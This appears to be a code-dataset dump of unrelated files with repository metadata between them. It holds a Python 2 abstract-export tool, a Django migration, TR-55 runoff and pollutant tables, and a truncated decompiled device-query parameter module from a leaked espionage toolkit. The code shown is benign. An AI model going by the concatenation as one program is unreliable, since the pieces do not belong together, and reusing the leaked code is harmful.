@param output is a string representing the output (for example: sys.stdout)
"""
output.write('import.py [options] where options are:\n')
output.write(' -i file Input file name [required] \n')
output.write(' -a file Authors Input file name [required if easychair] \n')
output.write(' -o output Output directory [required] \n')
output.write(' -s status Status number (0-4) [default=1=accepted]\n')
output.write(' -r reader name One of: sciencesconf or easychair [default=sciencesconf]\n')
output.write(' -S style name One of: basic, palme, nalte [default=basic]\n')
output.write(' -c compiler One of: pdflatex, xetex [default=pdflatex]\n')
output.write(' --nocsv Do not generate '+program+' CSV files\n')
output.write(' --notex Do not generate LaTeX files\n')
output.write(' --nohtml Do not generate HTML file\n')
output.write(' --help Print this help\n\n')
# End usage
# ----------------------------------------------------------------------
def Quit(message=None, status=0, usageoutput=None):
"""
Quit the program with the appropriate exit status.
@param message is a text to communicate to the user on sys.stderr.
@param status is an integer of the status exit value.
@param usageoutput is a file descriptor.
"""
if message: sys.stderr.write('export.py '+message)
if usageoutput: usage(usageoutput)
sys.exit(status)
# End Quit
# ----------------------------------------------------------------------
# --------------------------------------------------------------------------
# MAIN PROGRAM
# --------------------------------------------------------------------------
if __name__=="__main__":
# ----------------------------------------------------------------------
# Get all arguments, verify inputs.
# ----------------------------------------------------------------------
# Verify the program name and possibly some arguments
if len(sys.argv) == 1:
if not wxop:
# stop the program and print an error message
Quit(status=1, usageoutput=sys.stderr)
else:
app = wx.App(False)
ImportWizard(None)
app.MainLoop()
sys.exit(0)
# Get options (if any...)
try:
opts, args = getopt.getopt(sys.argv[1:], "i:a:o:s:r:S:c:", ["help", "nocsv", "notex", "nohtml"])
except getopt.GetoptError, err:
# Print help information and exit:
Quit(message="Error: "+str(err)+".\nUse option --help for any help.\n", status=1)
fileinput = None
authorsinput = None
output = None
extension = "tex"
status = 1 # only accepted papers
readername = "sciencesconf"
themename = "basic"
compiler = "pdflatex"
exportcsv = True
exporttex= True
exporthtml = True
# Extract options
for o, a in opts:
if o == "-i":
fileinput = a
elif o == "-a":
authorsinput = a
elif o == "-o":
output = a
elif o == "-s":
status = int(a)
elif o == "-r":
readername = a
elif o == "-S":
themename = a
elif o == "-c":
compiler = a
elif o == "--help": # need help
Quit(message='Help', status=0, usageoutput=sys.stdout)
elif o == "--nocsv":
exportcsv = False
elif o == "--notex":
exporttex = False
elif o == "--nohtml":
exporthtml = False
# Verify args
if fileinput is not None:
if not os.path.exists(fileinput):
Quit(message="Error: BAD input file name: "+fileinput+"\n", status=1)
else:
Quit(message="Error: an input is required.\n.", status=1, usageoutput=sys.stderr)
if output is None:
Quit(message="Error: an output is required.\n.", status=1, usageoutput=sys.stderr)
if readername == "easychair" and not authorsinput:
Quit(message="With easychair, an input file with authors is required.", status=1, usageoutput=sys.stderr)
try:
term = TerminalController()
print term.render('${GREEN}-----------------------------------------------------------------------${NORMAL}')
print term.render('${RED}'+program+' - Version '+version+'${NORMAL}')
print term.render('${BLUE}'+copyright+'${NORMAL}')
print term.render('${BLUE}'+url+'${NORMAL}')
print term.render('${GREEN}-----------------------------------------------------------------------${NORMAL}\n')
except:
print '-----------------------------------------------------------------------\n'
print program+' - Version '+version
print copyright
print url+'\n'
print '-----------------------------------------------------------------------\n'
# ----------------------------------------------------------------------
p = TextProgress()
# ----------------------------------------------------------------------
# Load input data
# ----------------------------------------------------------------------
arguments = {}
arguments['readername'] = readername
arguments['filename'] = fileinput
arguments['authorsfilename'] = authorsinput
arguments['progress'] = p
reader = Reader( arguments )
# ----------------------------------------------------------------------
# Write output data (with default parameters)
# ----------------------------------------------------------------------
# Create preferences
prefs = Preferences()
theme = all_themes.get_theme(themename.lower())
prefs.SetTheme( theme )
prefs.SetValue('COMPILER', 'str', compiler.strip())
# Create the Writer
writer = Writer( reader.docs )
writer.set_status( status )
writer.set_progress( p )
# Write abstracts as LaTeX
if exporttex:
writer.writeLaTeX_as_Dir( output, prefs, tocompile=True )
# Write proceed native CSV files
if exportcsv:
writer.writeCSV( output )
# Write html file
if exporthtml:
writer.writeHTML( output+".html" )
# Done
try:
term = TerminalController()
print term.render('${GREEN}-----------------------------------------------------------------------${NORMAL}')
print term.render('${RED}Result is in '+output)
print term.render('${GREEN}Thank you for using '+program+".")
print term.render('${GREEN}-----------------------------------------------------------------------${NORMAL}\n')
except:
print ('-----------------------------------------------------------------------\n')
print "Result is in "+output+".\nThank you for using "+program+"."
print ('-----------------------------------------------------------------------\n')
# ----------------------------------------------------------------------
|
gpl-3.0
| -6,585,036,941,953,271,000 | 36.044776 | 119 | 0.463638 | false |
phith0n/mooder
|
managements/migrations/0001_initial.py
|
1
|
1376
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-10-10 14:23
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='CoinLog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('coin', models.IntegerField(verbose_name='金币变化')),
('rest', models.PositiveIntegerField(verbose_name='变化后的金币')),
('created_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('last_modify_time', models.DateTimeField(auto_now=True, verbose_name='修改时间')),
('admin', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='coin_from_user', to=settings.AUTH_USER_MODEL, verbose_name='操作员')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='coin_to_user', to=settings.AUTH_USER_MODEL, verbose_name='目标用户')),
],
),
]
|
lgpl-3.0
| 4,721,096,928,858,244,000 | 41.774194 | 193 | 0.638009 | false |
WikiWatershed/tr-55
|
tr55/tables.py
|
1
|
19396
|
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
"""
TR-55 tables
"""
# For the different land uses, this describes the NLCD class value, the landscape factor (ki) and the Curve
# Numbers for each hydrologic soil group for that use type.
# NOTE: Missing NLCD type 12 (plus all Alaska only types (51, 72-74))
# For the BMP's the numbers are not Curve Numbers, they are quantities of rainfall (in inches)
# that will be converted to infiltration by that BMP for that soil type.
# The Food and Agriculture Organization of the United Nations (FAO) document on evapotranspiration is:
# Allen, R.G.; Pereira, L.S.; Raes, D.; Smith, M. Evapotranspiration and Crop Water Requirements;
# Irrigation and Drainage Paper No. 56; FAO: Rome, 1998.
# Available: http://www.fao.org/docrep/x0490e/x0490e00.htm#Contents
LAND_USE_VALUES = {
# NRCS Curve Numbers for NLCD land classes
'open_water': {'nlcd': 11, 'ki': 0.6525, 'cn': {'a': 100, 'b': 100, 'c': 100, 'd': 100}},
# Curve Number Source: Assumes 100% runoff
# Ki Source: FAO for Open Water, > 5 m depth, clear of turbidity, temperate climate.
'perennial_ice': {'nlcd': 12, 'ki': 0.0, 'cn': {'a': 100, 'b': 100, 'c': 100, 'd': 100}},
# Curve Number Source: Assumes 100% runoff
# Ki Source: Assumes no ET.
'developed_open': {'nlcd': 21, 'ki': 0.95, 'cn': {'a': 59, 'b': 75, 'c': 83, 'd': 87}},
# Curve Number Source: Blend of Pasture - medium and paved parking assuming 20% impervious.
# (TR-55, 1986, Table 2-2a)
# Ki Source: FAO for growing season for cool season turfgrass (dense stands of bluegrass, ryegrass, and fescue).
'developed_low': {'nlcd': 22, 'ki': 0.42, 'cn': {'a': 68, 'b': 80, 'c': 86, 'd': 89}},
# Curve Number Source: Blend of Pasture - medium and paved parking assuming 38% impervious.
# (TR-55, 1986, Table 2-2a)
# Ki Source: UNKNOWN
'developed_med': {'nlcd': 23, 'ki': 0.18, 'cn': {'a': 81, 'b': 88, 'c': 91, 'd': 93}},
# Curve Number Source: Blend of Pasture - medium and paved parking assuming 65% impervious.
# (TR-55, 1986, Table 2-2a)
# Ki Source: UNKNOWN
'developed_high': {'nlcd': 24, 'ki': 0.06, 'cn': {'a': 91, 'b': 94, 'c': 95, 'd': 96}},
# Curve Number Source: Blend of Pasture - medium and paved parking assuming 85% impervious.
# Ki Source: UNKNOWN
'barren_land': {'nlcd': 31, 'ki': 0.30, 'cn': {'a': 77, 'b': 86, 'c': 91, 'd': 94}},
# Curve Number Source: Fallow, Bare soil; Newly graded areas (TR-55, 1986, Table 2-2a and 2-2b)
# Ki Source: Sridhar, Venkataramana, "Evapotranspiration Estimation and Scaling Effects Over The Nebraska Sandhills"
# (2007). Great Plains Research: A Journal of Natural and Social Sciences. Paper 870.
# http://digitalcommons.unl.edu/greatplainsresearch/870
'deciduous_forest': {'nlcd': 41, 'ki': 1.0, 'cn': {'a': 30, 'b': 55, 'c': 70, 'd': 77}},
# Curve Number Source: Woods, Good condition;
# Woods are protected from grazing and litter and brush adequately cover the soil.
# (TR-55, 1986, Table 2-2c)
# Ki Source: Sridhar, Venkataramana, "Evapotranspiration Estimation and Scaling Effects Over The Nebraska Sandhills"
# (2007). Great Plains Research: A Journal of Natural and Social Sciences. Paper 870.
# http://digitalcommons.unl.edu/greatplainsresearch/870
'evergreen_forest': {'nlcd': 42, 'ki': 1.00, 'cn': {'a': 30, 'b': 55, 'c': 70, 'd': 77}},
# Curve Number Source: Woods, Good condition;
# Woods are protected from grazing and litter and brush adequately cover the soil.
# (TR-55, 1986, Table 2-2c)
# Ki Source: FAO for conifer trees during growing season in well-watered conditions for large forests.
'mixed_forest': {'nlcd': 43, 'ki': 1.0, 'cn': {'a': 30, 'b': 55, 'c': 70, 'd': 77}},
# Curve Number Source: Woods, Good condition;
# Woods are protected from grazing and litter and brush adequately cover the soil.
# (TR-55, 1986, Table 2-2c)
# Ki Source: Sridhar, Venkataramana, "Evapotranspiration Estimation and Scaling Effects Over The Nebraska Sandhills"
# (2007). Great Plains Research: A Journal of Natural and Social Sciences. Paper 870.
# http://digitalcommons.unl.edu/greatplainsresearch/870
'shrub': {'nlcd': 52, 'ki': 0.90, 'cn': {'a': 35, 'b': 56, 'c': 70, 'd': 77}},
# Curve Number Source: Brush, fair; 50-75% ground cover (TR-55, 1986, Table 2-2c)
# Ki Source: Descheemaeker, K., Raes, D., Allen, R., Nyssen, J., Poesen, J., Muys, B., Haile, M. and Deckers, J.
# 2011. Two rapid appraisals of FAO-56 crop coefficients for semiarid natural vegetation of the
# northern Ethiopian highlands. Journal of Arid Environments 75(4):353-359.
'grassland': {'nlcd': 71, 'ki': 1.08, 'cn': {'a': 30, 'b': 58, 'c': 71, 'd': 78}},
# Curve Number Source: Meadow - continuous grass, protected from grazing and generally mowed for hay.
# (TR-55, 1986, Table 2-2c)
# Ki Source: Average of all values in FAO document for Forages/Hay.
'pasture': {'nlcd': 81, 'ki': 0.95, 'cn': {'a': 39, 'b': 61, 'c': 74, 'd': 80}},
# Curve Number Source: Pasture, good; >75% ground cover and not heavily grazed. (TR-55, 1986, Table 2-2c)
# Ki Source: FAO for Grazing pasture with rotated grazing.
'cultivated_crops': {'nlcd': 82, 'ki': 1.15, 'cn': {'a': 67, 'b': 78, 'c': 85, 'd': 89}},
# Curve Number Source: Row crops, straight rows, good condition (TR-55, 1986, Table 2-2b)
# Ki Source: FAO average for all cereal crows during the growing season.
'woody_wetlands': {'nlcd': 90, 'ki': 1.20, 'cn': {'a': 30, 'b': 30, 'c': 30, 'd': 30}},
# Curve Number Source: Uses lowest curve numbers possible to maximize infiltration
# Ki Source: FAO for either Cattail/Bulrush wetland or Reed Swamp wetland during growing season.
'herbaceous_wetlands': {'nlcd': 95, 'ki': 1.20, 'cn': {'a': 30, 'b': 30, 'c': 30, 'd': 30}},
# Curve Number Source: Uses lowest curve numbers possible to maximize infiltration
# Ki Source: FAO for either Cattail/Bulrush wetland or Reed Swamp wetland during growing season.
# NRCS Curve Numbers for BMP's acting as land cover changes
'cluster_housing': {'ki': 0.42, 'cn': {'a': 62, 'b': 77, 'c': 84, 'd': 88}},
# Curve Number Source: Blend of Pasture - medium and paved parking assuming 26.8% impervious.
# Ki Source: UNKNOWN
'no_till': {'ki': 0.9, 'cn': {'a': 57, 'b': 73, 'c': 82, 'd': 86}},
# Curve Number Source: UNKNOWN
# Ki Source: UNKNOWN
# Storage Capacities and Maximum Loading Ratios for Infiltration BMP's
# storage is in m3/m2, max_drainage_ratio is the ratio of drawn BMP area to
# the maximum possible area that should contribute to it.
# NOTE that these contributing areas ratios are based only on the suggested
# drainage areas for a well-designed BMP's and have nothing to do with the
# user's actual placement of the BMP on the UI map.
'green_roof': {'ki': 0.4, 'storage': 0.020, 'max_drainage_ratio': 1},
# Assume a simple extensive vegetated roof cover with 2" of growth media
# at 15% porosity and 2" of granular discharge media at 25% porosity
# Assume drainage area is equal only to the water that falls directly on the roof
# (no extra contributing area).
# Source: PA stormwater manual 6.5.1
'infiltration_basin': {'ki': 0.0, 'storage': 0.610, 'max_drainage_ratio': 8},
# Assume a large open area with no infiltration underneath and 2' of ponding depth (100% porosity)
# Assume drainage area is largely pervious surface (lawns) allowing a maximum loading ratio of 8:1
# Source: New Jersey stormwater manual, PA stormwater manual appendix C
'porous_paving': {'ki': 0.0, 'storage': 0.267, 'max_drainage_ratio': 2},
# Assume porous bituminous asphalt used as the paving surface
# 2.5" of porous paving service at 16% porosity, 1" of bedding layer/choker course at 50% porosity,
# and 24" of infiltration bed/reservoir layer at 40% porosity
# Assume some allowable additional drainage area (2:1) from roofs or adjacent pavement
# Note that inflow from any pervious areas is not recommended due to potential clogging
# Sources: PA stormwater manual 6.4.1,
# StormTech (http://www.stormtech.com/download_files/pdf/techsheet1.pdf),
# http://www.construction.basf.us/features/view/pervious-pavements,
# http: // stormwater.pca.state.mn.us / index.php / Design_criteria_for_permeable_pavement
'rain_garden': {'ki': 0.08, 'storage': 0.396, 'max_drainage_ratio': 5},
# Assumes 6" of ponding depth at 100% porosity, 24" planting mix at 20% porosity
# and 12" gravel underbed at 40% porosity.
# Assume drainage area is largely impervious (parking lots) allowing a maximum loading ratio of 5:1
# Source: PA stormwater manual 6.4.5, PA stormwater manual appendix C
}
# Runoff tables for Pitt's Small Storm Hydrology (SSH) model
# The raw runoff coefficients are those measured by the USGS in Wisconsin
# (Bannerman 1983, 1992 and 1993; Horwatich, 2004; Steuer 1996 and 1997; USEPA 1993; Walker 1994; Waschbusch 1999)
# This data is also provided as the Rv (runoff coefficient) file for all regions *but* the SouthEast in version 10.x of WinSlamm #
# http://wi.water.usgs.gov/slamm/index.html
# http://wi.water.usgs.gov/slamm/slamm_parameter_descriptions.htm
# http://winslamm.com/Select_documentation.html #
#
# The Standard Land Uses, including the percents of land in area type and their level of connectedness,
# are collected from multiple published papers analyzing different sites using WinSLAMM
# Pitt has compiled all of the site summaries here:
# http://winslamm.com/docs/Standard%20Land%20Use%20and%20Parameter%20file%20descriptions%20final%20April%2018%202011.pdf
# The above pdf also lists the original sources of the raw data. #
#
# The final runoff volumens and runoff ratios for each standard land use were calculated as the sum of the multiples of the raw runoff coefficients
# for each area type and the percent of land in that area type in each standard land use.
#
# For this work, this is the mapping used between the NLCD class and the SSH's Standard Land Use:
# NLCD class 21 (Developed, Open) = "Open Space"
# NLCD class 22 (Developed, Low) = "Residential"
# NLCD class 23 (Developed, Medium) = "Institutional"
# NLCD class 24 (Developed, High) = "Commercial"
# The runoff coeffients for Cluster Housing were derived by taking the numbers for the residential SLU and
# halving the amount of street, driveway, and parking and adding that amount to the amount of small
# landscaping. This simulates LID concentrating housing and decreasing paving, while maintaining the
# same residential density (ie, the same amount of roof space).
SSH_RAINFALL_STEPS = [0.01, 0.08, 0.12, 0.2, 0.39, 0.59, 0.79, 0.98, 1.2, 1.6, 2, 2.4, 2.8, 3.2, 3.5, 3.9, 4.9]
SSH_RUNOFF_RATIOS = {
'developed_open' :
{'runoff_ratio':
{'a': [0.0393, 0.0472, 0.0598, 0.0645, 0.1045, 0.1272, 0.1372, 0.1432, 0.1493, 0.1558, 0.1609, 0.1637, 0.1662, 0.1686, 0.1711, 0.1726, 0.1757],
'b': [0.0393, 0.0472, 0.0598, 0.0645, 0.1177, 0.1462, 0.1636, 0.1697, 0.1809, 0.1874, 0.3127, 0.3148, 0.3165, 0.3182, 0.3199, 0.3206, 0.3229],
'c': [0.0393, 0.0472, 0.0598, 0.0645, 0.1193, 0.1528, 0.1769, 0.1904, 0.2008, 0.2423, 0.3127, 0.3148, 0.3165, 0.3182, 0.3199, 0.3624, 0.4066],
'd': [0.0393, 0.0472, 0.0598, 0.0645, 0.1193, 0.1528, 0.1769, 0.1904, 0.2008, 0.2423, 0.3127, 0.3148, 0.3165, 0.3182, 0.3199, 0.3624, 0.4066],
}
},
'developed_low' :
{'runoff_ratio':
{'a' : [0.0785, 0.1115, 0.1437, 0.1601, 0.1841, 0.2053, 0.2138, 0.2187, 0.2249, 0.2303, 0.2359, 0.2382, 0.2412, 0.2439, 0.2465, 0.2485, 0.2523],
'b' : [0.0785, 0.1115, 0.1437, 0.1601, 0.1960, 0.2224, 0.2377, 0.2426, 0.2534, 0.2589, 0.3731, 0.3748, 0.3770, 0.3791, 0.3809, 0.3822, 0.3853],
'c' : [0.0785, 0.1115, 0.1437, 0.1601, 0.1974, 0.2284, 0.2496, 0.2614, 0.2714, 0.3085, 0.3731, 0.3748, 0.3770, 0.3791, 0.3809, 0.4200, 0.4609],
'd' : [0.0785, 0.1115, 0.1437, 0.1601, 0.1974, 0.2284, 0.2496, 0.2614, 0.2714, 0.3085, 0.3731, 0.3748, 0.3770, 0.3791, 0.3809, 0.4200, 0.4609],
}
},
'developed_med' :
{'runoff_ratio':
{'a' : [0.1322, 0.1929, 0.2631, 0.3107, 0.3698, 0.4032, 0.4235, 0.4368, 0.4521, 0.4688, 0.4816, 0.4886, 0.4953, 0.5006, 0.5047, 0.5074, 0.5138],
'b' : [0.1322, 0.1929, 0.2631, 0.3150, 0.3838, 0.4226, 0.4474, 0.4616, 0.4797, 0.4980, 0.5715, 0.5803, 0.5887, 0.5944, 0.6002, 0.6045, 0.6146],
'c' : [0.1322, 0.1929, 0.2631, 0.3150, 0.3846, 0.4258, 0.4539, 0.4717, 0.4895, 0.5249, 0.5715, 0.5803, 0.5887, 0.5944, 0.6002, 0.6248, 0.6553],
'd' : [0.1322, 0.1929, 0.2631, 0.3150, 0.3846, 0.4258, 0.4539, 0.4717, 0.4895, 0.5249, 0.5715, 0.5803, 0.5887, 0.5944, 0.6002, 0.6248, 0.6553],
}
},
'developed_high' :
{'runoff_ratio':
{'a': [0.1966, 0.2815, 0.4034, 0.4796, 0.5549, 0.6037, 0.6311, 0.6471, 0.6675, 0.6891, 0.7063, 0.7154, 0.7257, 0.7335, 0.7389, 0.7435, 0.7533],
'b': [0.1966, 0.2815, 0.4034, 0.4895, 0.5803, 0.6343, 0.6647, 0.6818, 0.7045, 0.7274, 0.7724, 0.7820, 0.7925, 0.8005, 0.8059, 0.8104, 0.8203],
'c': [0.1966, 0.2815, 0.4034, 0.4895, 0.5807, 0.6358, 0.6677, 0.6865, 0.7090, 0.7398, 0.7724, 0.7820, 0.7925, 0.8005, 0.8059, 0.8197, 0.8390],
'd': [0.1966, 0.2815, 0.4034, 0.4895, 0.5807, 0.6358, 0.6677, 0.6865, 0.7090, 0.7398, 0.7724, 0.7820, 0.7925, 0.8005, 0.8059, 0.8197, 0.8390],
}
},
'cluster_housing' :
{'runoff_ratio':
{'a': [0.0466, 0.0733, 0.0956, 0.1084, 0.1262, 0.1387, 0.1452, 0.1492, 0.1538, 0.1580, 0.1623, 0.1641, 0.1664, 0.1684, 0.1701, 0.1717, 0.1743],
'b': [0.0466, 0.0733, 0.0956, 0.1084, 0.1395, 0.1578, 0.1718, 0.1758, 0.1856, 0.1897, 0.3146, 0.3157, 0.3171, 0.3183, 0.3193, 0.3201, 0.3218],
'c': [0.0466, 0.0733, 0.0956, 0.1084, 0.1411, 0.1645, 0.1851, 0.1966, 0.2056, 0.2449, 0.3146, 0.3157, 0.3171, 0.3183, 0.3193, 0.3619, 0.4056],
'd': [0.0466, 0.0733, 0.0956, 0.1084, 0.1411, 0.1645, 0.1851, 0.1966, 0.2056, 0.2449, 0.3146, 0.3157, 0.3171, 0.3183, 0.3193, 0.3619, 0.4056],
}
},
}
# The set of best management practices that we know about. The
# cluster_housing and no_till types are excluded because they do not
# actively retain water.
BMPS = set(['green_roof', 'porous_paving',
'rain_garden', 'infiltration_basin'])
# The set of "built" land uses
# These are the land uses to which the Pitt model will be applied at less than 2" of rain.
BUILT_TYPES = set(['developed_open', 'developed_low', 'developed_med',
'developed_high', 'cluster_housing'])
NON_NATURAL = set(['pasture', 'cultivated_crops', 'green_roof']) | set(['no_till']) | BMPS | BUILT_TYPES
# The set of pollutants that we are concerned with.
POLLUTANTS = set(['tn', 'tp', 'bod', 'tss'])
# Event mean concentrations (mg/l) by pollutant and NLCD type
# tn: Total Nitrogen, tp: Total Phosphorus,
# bod: Biochemical Oxygen Demand, tss: Total Suspended Solids
# Data from:
# (1) USEPA, 2011. User’s Guide: Spreadsheet Tool for Estimation of Pollutant Load (STEPL), Version 4.1, 57 pp.
# (2) Pennsylvania Department of Environmental Protection, 2006.
# Pennsylvania Stormwater Best Management Practices Manual. 685 pp.
# (3) USEPA, 2005. The National Stormwater Quality Database, Version 1.2: A Compilation and Analysis of NPDES
# Stormwater Monitoring Information. USEPA, Office of Water, Washington, DC, 447 pp.
# (4) New Hampshire Dept. of Environmental Services, 2010. Guidance for Estimating Pre- and Post-Development
# Stormwater Loads. (EMCs available at
# http://www.des.nh.gov/organization/divisions/water/stormwater/documents/wd-08-20a_apxd.pdf)
# (5) Washington State Dept. of Ecology, 2007. Efficiency of Urban Stormwater Best Management Practices:
# A Literature Review. Publication No. 07-03-009, 12 pp.
# (6) Keiser & Associates, 2003. Empirical Sediment and Phosphorus Nonpoint Source Model for the St. Joseph River
# Watershed. 48 pp.
POLLUTION_LOADS = {
11: {'tn': 0, 'tp': 0, 'bod': 0, 'tss': 0}, # Open water
12: {'tn': 0, 'tp': 0, 'bod': 0, 'tss': 0}, # Perennial Ice/Snow
21: {'tn': 2.26, 'tp': 0.32, 'bod': 5.7, 'tss': 99.8}, # Developed, Open Space
22: {'tn': 2.58, 'tp': 0.38, 'bod': 6.0, 'tss': 126}, # Developed, Low Intensity
23: {'tn': 3.62, 'tp': 0.38, 'bod': 9.0, 'tss': 134.7}, # Developed, Medium Intensity
24: {'tn': 3.54, 'tp': 0.35, 'bod': 9.9, 'tss': 163.7}, # Developed High Intensity
31: {'tn': 0.10, 'tp': 0.01, 'bod': 0.0, 'tss': 1}, # Barren Land (Rock/Sand/Clay)
32: {'tn': 0.10, 'tp': 0.01, 'bod': 0.0, 'tss': 1}, # Quarries/Strip Mines/Gravel Pits
41: {'tn': 1.05, 'tp': 0.13, 'bod': 0.5, 'tss': 45}, # Deciduous Forest
42: {'tn': 1.05, 'tp': 0.13, 'bod': 0.5, 'tss': 45}, # Evergreen Forest
43: {'tn': 1.05, 'tp': 0.13, 'bod': 0.5, 'tss': 45}, # Mixed Forest
51: {'tn': 0, 'tp': 0, 'bod': 0, 'tss': 0}, # Dwarf Scrub (Alaska Only, N/A)
52: {'tn': 0.19, 'tp': 0.15, 'bod': 0.5, 'tss': 39}, # Shrub/Scrub
71: {'tn': 2.30, 'tp': 0.22, 'bod': 0.5, 'tss': 48.8}, # Grassland/Herbaceous
72: {'tn': 0, 'tp': 0, 'bod': 0, 'tss': 0}, # Sedge/Herbaceous (Alaska Only, N/A)
73: {'tn': 0, 'tp': 0, 'bod': 0, 'tss': 0}, # Lichens (Alaska Only, N/A)
74: {'tn': 0, 'tp': 0, 'bod': 0, 'tss': 0}, # Moss (Alaska Only, N/A)
81: {'tn': 5.71, 'tp': 0.55, 'bod': 13, 'tss': 145}, # Pasture/Hay
82: {'tn': 7.70, 'tp': 1.07, 'bod': 12.45, 'tss': 216}, # Cultivated Crops
90: {'tn': 0.19, 'tp': 0.006, 'bod': 0.5, 'tss': 0}, # Woody Wetlands
91: {'tn': 0.19, 'tp': 0.006, 'bod': 0.5, 'tss': 0},
92: {'tn': 0.19, 'tp': 0.006, 'bod': 0.5, 'tss': 0},
93: {'tn': 0.19, 'tp': 0.006, 'bod': 0.5, 'tss': 0},
94: {'tn': 0.19, 'tp': 0.006, 'bod': 0.5, 'tss': 0},
95: {'tn': 0.19, 'tp': 0.006, 'bod': 0.5, 'tss': 0}, # Emergent Herbaceous Wetlands
96: {'tn': 0.19, 'tp': 0.006, 'bod': 0.5, 'tss': 0},
97: {'tn': 0.19, 'tp': 0.006, 'bod': 0.5, 'tss': 0},
98: {'tn': 0.19, 'tp': 0.006, 'bod': 0.5, 'tss': 0},
99: {'tn': 0.19, 'tp': 0.006, 'bod': 0.5, 'tss': 0}
}
|
apache-2.0
| 2,153,564,880,117,881,900 | 71.096654 | 158 | 0.601526 | false |
DarthMaulware/EquationGroupLeaks
|
Leak #5 - Lost In Translation/windows/Resources/Dsz/PyScripts/Lib/dsz/mca/status/cmd/devicequery/type_Params.py
|
1
|
3783
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: type_Params.py
from types import *
import array
PARAMS_DEVICE_TYPE_USER_SPECIFIC = 0
PARAMS_DEVICE_TYPE_U1394 = 1
PARAMS_DEVICE_TYPE_ADAPTER = 2
PARAMS_DEVICE_TYPE_ALL = 255
PARAMS_DEVICE_TYPE_APM_SUPPORT = 3
PARAMS_DEVICE_TYPE_BATTERY = 4
PARAMS_DEVICE_TYPE_CDROM = 5
PARAMS_DEVICE_TYPE_COMPUTER = 6
PARAMS_DEVICE_TYPE_DECODER = 7
PARAMS_DEVICE_TYPE_DISK_DRIVE = 8
PARAMS_DEVICE_TYPE_DISPLAY = 9
PARAMS_DEVICE_TYPE_FDC = 10
PARAMS_DEVICE_TYPE_FLOPPY = 11
PARAMS_DEVICE_TYPE_GPS = 12
PARAMS_DEVICE_TYPE_HDC = 13
PARAMS_DEVICE_TYPE_HID_CLASS = 14
PARAMS_DEVICE_TYPE_IMAGE = 15
PARAMS_DEVICE_TYPE_INFRARED = 16
PARAMS_DEVICE_TYPE_KEYBOARD = 17
PARAMS_DEVICE_TYPE_LEGACY_DRIVER = 18
PARAMS_DEVICE_TYPE_MEDIA = 19
PARAMS_DEVICE_TYPE_MEDIUM_CHANGER = 20
PARAMS_DEVICE_TYPE_MODEM = 21
PARAMS_DEVICE_TYPE_MONITOR = 22
PARAMS_DEVICE_TYPE_MOUSE = 23
PARAMS_DEVICE_TYPE_MTD = 24
PARAMS_DEVICE_TYPE_MULTIFUNCTION = 25
PARAMS_DEVICE_TYPE_MULTIPORT_SERIAL = 26
PARAMS_DEVICE_TYPE_NET = 27
PARAMS_DEVICE_TYPE_NET_CLIENT = 28
PARAMS_DEVICE_TYPE_NET_SERVICE = 29
PARAMS_DEVICE_TYPE_NET_TRANS = 30
PARAMS_DEVICE_TYPE_NO_DRIVER = 31
PARAMS_DEVICE_TYPE_PARALLEL = 32
PARAMS_DEVICE_TYPE_PCMCIA = 33
PARAMS_DEVICE_TYPE_PORTS = 34
PARAMS_DEVICE_TYPE_PRINTER = 35
PARAMS_DEVICE_TYPE_PRINTER_UPGRADE = 36
PARAMS_DEVICE_TYPE_SCSI_ADAPTER = 37
PARAMS_DEVICE_TYPE_SMART_CARD_READER = 38
PARAMS_DEVICE_TYPE_SOUND = 39
PARAMS_DEVICE_TYPE_STILL_IMAGE = 40
PARAMS_DEVICE_TYPE_SYSTEM = 41
PARAMS_DEVICE_TYPE_TAPE_DRIVE = 42
PARAMS_DEVICE_TYPE_UNKNOWN = 43
PARAMS_DEVICE_TYPE_USB = 44
PARAMS_DEVICE_TYPE_VOLUME = 45
PARAMS_DEVICE_TYPE_U1394DEBUG = 46
PARAMS_DEVICE_TYPE_U61883 = 47
PARAMS_DEVICE_TYPE_AVC = 48
PARAMS_DEVICE_TYPE_BIOMETRIC = 49
PARAMS_DEVICE_TYPE_BLUETOOTH = 50
PARAMS_DEVICE_TYPE_DOT4 = 51
PARAMS_DEVICE_TYPE_DOT4PRINT = 52
PARAMS_DEVICE_TYPE_ENUM1394 = 53
PARAMS_DEVICE_TYPE_INFINIBAND = 54
PARAMS_DEVICE_TYPE_PNPPRINTERS = 55
PARAMS_DEVICE_TYPE_PROCESSOR = 56
PARAMS_DEVICE_TYPE_SBP2 = 57
PARAMS_DEVICE_TYPE_SECURITYACCELERATOR = 58
PARAMS_DEVICE_TYPE_VOLUMESNAPSHOT = 59
PARAMS_DEVICE_TYPE_WCEUSBS = 60
PARAMS_GUID_LEN = 16
class Params:
def __init__(self):
self.__dict__['choice'] = PARAMS_DEVICE_TYPE_USER_SPECIFIC
self.__dict__['guid'] = array.array('B')
i = 0
while i < PARAMS_GUID_LEN:
self.__dict__['guid'].append(0)
i = i + 1
def __getattr__(self, name):
if name == 'choice':
return self.__dict__['choice']
if name == 'guid':
return self.__dict__['guid']
raise AttributeError("Attribute '%s' not found" % name)
def __setattr__(self, name, value):
if name == 'choice':
self.__dict__['choice'] = value
elif name == 'guid':
self.__dict__['guid'] = value
else:
raise AttributeError("Attribute '%s' not found" % name)
def Marshal(self, mmsg):
from mcl.object.Message import MarshalMessage
submsg = MarshalMessage()
submsg.AddU32(MSG_KEY_PARAMS_CHOICE, self.__dict__['choice'])
submsg.AddData(MSG_KEY_PARAMS_GUID, self.__dict__['guid'])
mmsg.AddMessage(MSG_KEY_PARAMS, submsg)
def Demarshal(self, dmsg, instance=-1):
import mcl.object.Message
msgData = dmsg.FindData(MSG_KEY_PARAMS, mcl.object.Message.MSG_TYPE_MSG, instance)
submsg = mcl.object.Message.DemarshalMessage(msgData)
